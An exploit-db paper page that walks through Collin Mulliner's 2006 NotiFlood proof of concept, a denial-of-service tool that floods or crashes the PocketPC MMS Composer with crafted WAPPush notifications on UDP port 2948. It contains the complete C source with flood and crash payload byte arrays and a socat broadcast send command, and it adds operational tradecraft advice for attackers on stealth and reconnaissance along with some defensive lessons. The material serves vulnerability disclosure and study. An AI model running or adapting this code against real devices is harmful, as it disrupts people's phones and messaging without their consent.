By exploitdb papers bot•August 9, 2006•

papers

PocketPC MMS Composer WAPPush Denial of Service Exploit Explained

What this paper is

This paper, published in 2006 by Collin Mulliner, presents a proof-of-concept tool called "NotiFlood." Its purpose is to demonstrate a denial-of-service (DoS) vulnerability in the MMS (Multimedia Messaging Service) Composer on PocketPC devices. The exploit targets the WAPPush port (UDP:2948) and can either flood the device with notifications, causing it to freeze or reject messages, or repeatedly crash the MMS client, making it unusable.

Simple technical breakdown

The vulnerability lies in how the PocketPC MMS Composer handles incoming MMS "new message notifications." These notifications are sent over UDP to port 2948. The tool crafts specially malformed or excessively repetitive notifications.

Flood Mode: Sends a large number of valid-looking notifications. This triggers the device to play a sound for each, and if auto-receive is enabled, it might attempt to connect to the network (e.g., GPRS). After receiving many notifications, the device becomes unstable, freezes, or stops accepting new messages. The MMS inbox also gets filled with these messages, which can only be deleted manually, one by one.
Crash Mode: Sends notifications that are designed to cause the MMS client application to crash. This prevents the user from accessing the MMS inbox and potentially other related services like email (POP3/IMAP) while the device is connected to Wi-Fi.

The tool uses two different byte arrays (mms1 and mms2) representing these notifications, with mms2 being specifically crafted for the crash mode.

Complete code and payload walkthrough

The provided C code implements the NotiFlood tool. Let's break down its components:

1. Data Structures and Global Variables:

mms1_pos[]: An array of integers defining specific byte offsets within the mms1 payload. These offsets are likely where dynamic data (like timestamps or URLs) needs to be inserted.
mms1[]: An array of unsigned characters representing the payload for "flood" mode. It's a byte sequence designed to look like an MMS notification.
mms2[]: An array of unsigned characters representing the payload for "crash" mode. It's similar to mms1 but likely contains variations intended to trigger a crash.
to[], from[], subject[]: Global character arrays to store recipient, sender, and subject information for the MMS notification. These can be overridden by command-line arguments.
iteration: An unsigned integer counter, used to generate unique values for each sent packet.

2. iterate(unsigned char *nty, int *pos) function:

Purpose: This function dynamically modifies parts of the notification payload (nty) at specified positions (pos).
Inputs:
- nty: A pointer to the notification payload (either mms1 or mms2).
- pos: A pointer to an array of integer offsets within the payload.
Behavior:
- It creates two temporary character buffers, tmp and tmp2.
- sprintf(tmp, "%u%u", time(NULL), iteration);: Generates a string by concatenating the current Unix timestamp (time(NULL)) and the iteration counter. This creates a unique identifier for each notification.
- memset(&nty[pos[0]], '0', 57);: Clears 57 bytes at the offset pos[0] in the payload, filling them with '0's.
- memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56);: Copies the generated tmp string into the payload at pos[0]. It ensures that no more than 56 bytes are copied to prevent buffer overflows, or the entire tmp string if it's shorter.
- sprintf(tmp2, "http://127.0.0.1/?%s",tmp);: Creates a URL string using the generated tmp identifier. This URL is likely part of the data that triggers the vulnerability.
- memset(&nty[pos[4]], '0', 57);: Clears 57 bytes at the offset pos[4] in the payload.
- memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56);: Copies the generated tmp2 URL string into the payload at pos[4], again with a size limit.
Output: Modifies the nty payload in place.
Mapping:
- nty: The MMS notification payload being modified.
- pos[0]: Offset for inserting a timestamp-based identifier.
- pos[4]: Offset for inserting a crafted URL.

3. init(unsigned char *nty, int *pos) function:

Purpose: Initializes specific fields within the notification payload with sender, recipient, and subject information.
Inputs:
- nty: A pointer to the notification payload.
- pos: A pointer to an array of integer offsets.
Behavior:
- memset(&nty[pos[1]], ' ', 56);: Clears 56 bytes at pos[1] with spaces.
- memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56);: Copies the from address into the payload at pos[1], with a size limit.
- memset(&nty[pos[2]], ' ', 56);: Clears 56 bytes at pos[2] with spaces.
- memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56);: Copies the to address into the payload at pos[2], with a size limit.
- memset(&nty[pos[3]], ' ', 56);: Clears 56 bytes at pos[3] with spaces.
- memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56);: Copies the subject into the payload at pos[3], with a size limit.
Output: Modifies the nty payload in place.
Mapping:
- pos[1]: Offset for the sender (from) field.
- pos[2]: Offset for the recipient (to) field.
- pos[3]: Offset for the subject field.

4. usage() function:

Purpose: Prints the help message and usage instructions for the notiflood tool.
Behavior: Displays available command-line options and their descriptions.

5. main(int argc, char **argv) function:

Purpose: The entry point of the program. It parses command-line arguments, prepares the payload, and sends it to the target.
Behavior:
- Argument Parsing: Uses getopt to parse command-line options like destination IP (-d), interval (-i), number of packets (-n), subject (-s), from (-f), to (-t), crash mode (-c), flip-flop mode (-F), quiet mode (-q), and help (-h).
- Initialization:
  - Sets default values for dest, interval, num, verbose, and mode.
  - Calls init() for both mms1 and mms2 payloads to populate the sender, recipient, and subject fields.
- Verbose Output: If verbose is true, prints the configured settings.
- Mode Handling: Sets the flipflop flag if -F is used.
- Main Loop (do-while):
  - iteration++: Increments the global counter.
  - f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666);: Creates or truncates a file named "mmsflood.fld" for writing the payload.
  - Payload Selection:
    - If mode == 0 (flood): Calls iterate(mms1, mms1_pos) to modify mms1 and then writes mms1 to "mmsflood.fld".
    - If mode == 1 (crash): Calls iterate(mms2, mms2_pos) to modify mms2 and then writes mms2 to "mmsflood.fld".
  - close(f);: Closes the file.
  - sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest);: Constructs a shell command. This command uses socat to read the content of "mmsflood.fld" and send it as UDP packets to the specified destination IP (dest) on port 2948. The & at the end runs this command in the background.
  - system(system_cmd);: Executes the constructed shell command.
  - Flip-flop Logic: If flipflop is enabled, it toggles the mode between 0 and 1 for the next iteration.
  - if (interval > 0) usleep(interval);: Pauses execution for the specified interval in microseconds if interval is greater than 0.
  - Loop Condition: Continues as long as iteration is less than num (if num is not 0) or if num is 0 (unlimited packets).
- Return: Exits with status 0.

Payload Bytes (mms1 and mms2):

These byte arrays represent the raw data sent as UDP packets. They appear to be structured in a way that the PocketPC MMS Composer expects for an MMS notification. The specific values and their arrangement are crucial for triggering the vulnerability.

The initial bytes (0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00) likely represent a MIME type or content identifier for an MMS message.
The subsequent bytes are filled with various data, including what appear to be placeholders for sender, recipient, subject, and other message details.
The mms1_pos and mms2_pos arrays point to specific locations within these byte arrays where dynamic data (like timestamps, URLs, or potentially malformed data) will be inserted by the iterate and init functions.
The mms2 payload contains sequences of 0x41 (ASCII 'A') in places where mms1 might have different data. This suggests that mms2 is specifically crafted with potentially problematic data to induce a crash.

socat command:

cat mmsflood.fld: Reads the content of the generated payload file.
|: Pipes the output of cat to socat.
socat udp4:<dest>:2948,broadcast stdin: socat is a versatile network utility. Here, it's configured to:
- udp4: Use UDP over IPv4.
- <dest>:2948: Send to the specified destination IP (dest) on port 2948.
- broadcast: Send the packet as a broadcast if the destination is a broadcast address (e.g., 192.168.1.255).
- stdin: Read data from standard input (which is piped from cat).
&: Runs the socat command in the background.

Mapping list:

mms1_pos, mms2_pos: Define critical offsets within the payloads for dynamic data insertion.
mms1[]: Payload for flooding the MMS client.
mms2[]: Payload designed to crash the MMS client.
to, from, subject: User-configurable fields for the MMS notification.
iteration: Counter to ensure unique payloads per send.
iterate(): Function to inject dynamic, unique data into the payload.
init(): Function to inject static sender, recipient, and subject data.
main(): Orchestrates argument parsing, payload generation, and sending.
system_cmd construction with socat: The mechanism for sending the crafted UDP packets.

Practical details for offensive operations teams

Required Access Level: Network access to the target subnet or direct Wi-Fi connectivity to the target device is required. No elevated privileges on the target device are needed, as this is a network-based attack.
Lab Preconditions:
- A controlled network environment simulating the target's network.
- A PocketPC device (or emulator) running a vulnerable version of Windows Mobile/CE (specifically tested on WinCE 4.2x with MMS Composer 1.5 and 2.0).
- The target device must be connected to the network (Wi-Fi is ideal for this exploit).
- The socat utility must be installed on the attacker's machine.
- The notiflood executable must be compiled on a Linux system (as it uses standard Linux networking headers and getopt).
Tooling Assumptions:
- The attacker machine runs a Linux-based OS.
- socat is available.
- A C compiler (like GCC) is available for compiling notiflood.
Execution Pitfalls:
- Network Segmentation: If the target device is on a different network segment and there are no routing or broadcast mechanisms allowing the crafted UDP packets to reach it, the attack will fail.
- Firewalls: Network firewalls blocking UDP traffic on port 2948 will prevent the exploit from reaching the target.
- MMS Composer Version: The exploit is specific to older versions of PocketPC MMS Composer. Newer versions might have patched this vulnerability.
- Auto-Receive Configuration: The "flood" mode's effectiveness in causing network connections depends on the device's auto-receive settings for MMS.
- Broadcast vs. Unicast: Using broadcast (-d 192.168.1.255) is effective for targeting multiple devices on the same subnet but can generate noise. Targeting a specific IP (-d <target_ip>) is more precise.
- Payload Corruption: If the mmsflood.fld file is not created correctly or if socat fails to send the data, the exploit will not work.
- Crash Mode Reliability: While designed to crash, the exact behavior of the crash mode can vary slightly depending on the specific device model and OS configuration.
- Flip-flop Mode: The -F option toggles between flood and crash modes. This can be used to repeatedly disrupt the service, but it also means the attacker needs to monitor the target's state to understand which mode is currently active.
Tradecraft Considerations:
- Reconnaissance: Identifying the target device's IP address and confirming it's a PocketPC running an older OS is crucial. Checking for open UDP port 2948 would be beneficial.
- Stealth: Sending a large volume of UDP packets, especially broadcast packets, can be noisy and easily detected by network monitoring tools. Targeting specific IPs and using longer intervals can reduce noise.
- Payload Delivery: The exploit relies on sending raw UDP packets. The socat command is a simple way to achieve this, but more sophisticated packet crafting tools could be used for advanced scenarios.
- Post-Exploitation: If the goal is to gain further access, crashing the MMS client might be a precursor to other attacks that exploit different services on the device. However, this paper focuses solely on DoS.
- Limited Scope: This exploit is specific to the MMS Composer and its WAPPush handling. It does not provide remote code execution or access to sensitive data.

Where this was used and when

This exploit was presented at DEFCON 14 in 2006. The paper and tool were released around the same time. It was designed to demonstrate vulnerabilities in PocketPC phones of that era, specifically targeting the MMS Composer. The vulnerability was likely present in devices running Windows Mobile/CE versions 4.2x with MMS Composer versions 1.5 and 2.0. Given the age of the exploit, it's highly unlikely to be effective against modern smartphones or even significantly updated versions of older mobile operating systems.

Defensive lessons for modern teams

Protocol Validation: Implement robust validation of incoming network protocols and message formats. Unexpected or malformed data should be handled gracefully, not by crashing the application.
Resource Limiting: Applications handling network services should have built-in limits on the number of messages or connections they can process within a given time frame to prevent flooding.
Secure Defaults: Disable auto-receive features for potentially resource-intensive services like MMS by default.
Regular Patching and Updates: Keep operating systems and applications, especially those exposed to network services, up-to-date with the latest security patches.
Network Segmentation and Firewalls: Isolate critical devices and services using network segmentation. Employ firewalls to restrict access to necessary ports and protocols from untrusted sources.
Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect and alert on unusual network traffic patterns, such as a high volume of UDP packets to specific ports.
Application Sandboxing: Run applications in sandboxed environments to limit the impact of a compromise or crash on the rest of the system.
Modern Messaging Protocols: Modern messaging systems (like those used in current smartphones) employ more secure and robust protocols, often with end-to-end encryption and better error handling, making them less susceptible to such simple DoS attacks.

ASCII visual (if applicable)

This exploit is primarily a network-based attack targeting a specific service on a device. A simple visual representation of the attack flow:

+-----------------+       +-----------------------+       +---------------------+
| Attacker Machine| ----> | Network (UDP:2948)    | ----> | Target PocketPC     |
| (NotiFlood Tool)|       | (e.g., Wi-Fi)         |       | (MMS Composer)      |
+-----------------+       +-----------------------+       +----------+----------+
                                                                     |
                                                                     | (Vulnerable Handling)
                                                                     v
                                                            +---------------------+
                                                            | Denial of Service   |
                                                            | (Crash/Freeze)      |
                                                            +---------------------+

Explanation:

The attacker's machine runs the NotiFlood tool.
The tool crafts UDP packets and sends them over the network (e.g., Wi-Fi).
These packets are directed to the target PocketPC's UDP port 2948.
The vulnerable MMS Composer on the PocketPC receives these packets.
Due to improper handling, the device experiences a denial of service, either by crashing or freezing.

Source references

PAPER ID: 2156
PAPER TITLE: PocketPC Mms Composer - 'WAPPush' Denial of Service
AUTHOR: Collin Mulliner
PUBLISHED: 2006-08-09
KEYWORDS: Hardware,dos
PAPER URL: https://www.exploit-db.com/papers/2156
RAW URL: https://www.exploit-db.com/raw/2156

Original Exploit-DB Content (Verbatim)

/*
 *  This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer
 *  flood/crash vulnerability (ab)using the WAPPush port UDP:2948
 *
 *  This is for educational purposes only! Please use responsible!
 *
 *  (c) Collin Mulliner <collin@trifinite.org>
 *  http://www.trifinite.org 
 *  http://www.mulliner.org/pocketpc/
 *
 * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder
 *
 *(c) Collin Mulliner <collin@trifinite.org>
 *
 * http://www.mulliner.org/pocketpc/
 * http://www.trifinite.org/
 *
 **** For educational purposes only! Please use responsible! ***
 *
 * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC
 * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against 
 * PocketPC Phones".
 *
 * The tool sends MMS new message notifications to the target PocketPC device over
 * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for 
 * every received notification. If auto receive is enabled the phone will try to
 * dial-up GPRS in order to receive the message. After receiving a couple 
 * hundred messages the phone randomly freezes or rejects new messages. Further
 * the MMS inbox is filled up with messages that only can be deleted manually
 * one-by-one. In crash mode, each notification crashes the MMS client and
 * therefore actively keeps the user from using the Inbox application while
 * connected to WiFi (the Inbox application also handles email like via POP3 and
 * IMAP).
 *
 * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0
 *
 * Examples:
 *  flood all clients in 192.168.1/24:
 *  notiflood -d 192.168.1.255 -n 0
 *
 *  crash client at: 192.168.42.29:
 *  notiflood -d 192.168.42.29 -i 500000 -n 1 -c
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
//#include <libnet.h>
#include <sys/poll.h>
#include <sys/ioctl.h>
#include <linux/if_tun.h> 
#include <arpa/inet.h>
#include <getopt.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <net/ethernet.h>
#include <time.h>
#include <sys/un.h>

int mms1_pos[] = {40, 106, 167, 228, 289};

unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00};

unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00};

int mms2_pos[] = { 40, 314, 375, 436, 489 };

char to[100] = {"receiver@receiver.com"};
char from[100] = {"sender@sender.net"};
char subject[100] = {"Your P0ckEtPC just P00PED itself!"};

unsigned int iteration = 0;

void iterate(unsigned char *nty, int *pos)
{
	char tmp[57];
	char tmp2[57];
	
	sprintf(tmp, "%u%u", time(NULL), iteration);
	memset(&nty[pos[0]], '0', 57);
	memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56);
	
	sprintf(tmp2, "http://127.0.0.1/?%s",tmp);
	memset(&nty[pos[4]], '0', 57);
	memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56);
}


void init(unsigned char *nty, int *pos)
{
	memset(&nty[pos[1]], ' ', 56);
	memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56);
	memset(&nty[pos[2]], ' ', 56);
	memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56);
	memset(&nty[pos[3]], ' ', 56);
	memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56);
}

void usage()
{
	printf(""\
	"notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\
	" (c) 2006 Collin Mulliner <collin@trifinite.org>\n"\
	" http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\
	" for educational purposes only, please use responsible!\n\n"\
	"options:\n"\
	"\t-d destination ip (broadcast works!)\n"\
	"\t-i interval (useconds)\n"\
	"\t-n number of packets (0=unlimited)\n"\
	"\t-s subject\n"\
	"\t-f from\n"\
	"\t-t to\n"\
	"\t-c crash client\n"\
	"\t-F flip-flop between crash / start client\n"\
	"\t-h help\n"\
	"\t-q quiet\n\n");
	
}

int main(int argc, char **argv)
{
	int f, i, l = 0;
	char system_cmd[200];
	int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop
	int opt;
	char dest[20] = {0};
	int interval = 500000;
	unsigned int num = 0;
	int verbose = 1;
	int flipflop = 0;

	
	while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) {
		switch (opt) {
		case 'd':
			strncpy(dest, optarg, 19);
			break;
		case 's':
			strncpy(subject, optarg, 56);
			break;
		case 't':
			strncpy(to, optarg, 56);
			break;
		case 'f':
			strncpy(from, optarg, 56);
			break;
		case 'c':
			mode = 1;
			break;
		case 'F':
			mode = 2;
			break;
		case 'n':
			num = atoi(optarg);
			break;
		case 'i':
			interval = atoi(optarg);
			break;
		case 'q':
			verbose = 0;
			break;
		default:
		case 'h':
			usage();
			break;
		}
	}

	if (optind < argc) {
		usage();
		exit(-1);
	}
	if (strlen(dest) == 0) {
		usage();
		exit(-1);
	}

	sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest);

	init(mms1, mms1_pos);
	init(mms2, mms2_pos);

	if (verbose) {
		printf("to:      %s\n", to);
		printf("from:    %s\n", from);
		printf("subject: %s\n", subject);
		printf("dst-ip: %s\n", dest);
		if (mode == 1) printf("crash client\n");
		else if (mode == 0) printf("fillup client inbox\n");
		else printf("flip-flop mode\n");
		printf("flood interval: %d seconds\n", interval);
		printf("number of packets: %d (0=unlimited)\n", num);
	}

	if (mode == 2) {
		flipflop = 1;
	}

	do {
		iteration++;
		f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666);
		if (mode == 0) { // flood
			iterate(mms1, mms1_pos);
			write(f, mms1, sizeof(mms1));
		}
		else if (mode == 1) { // crash
			iterate(mms2, mms2_pos);
			write(f, mms2, sizeof(mms2));
		}
		close(f);
		system(system_cmd);
		if (flipflop == 1) {
			if (mode == 0) mode = 1;
			else mode = 0;
		}
		if (interval > 0) usleep(interval);
	} while ((iteration < num && num != 0) || num == 0);
	
	return(0);
}

// milw0rm.com [2006-08-09]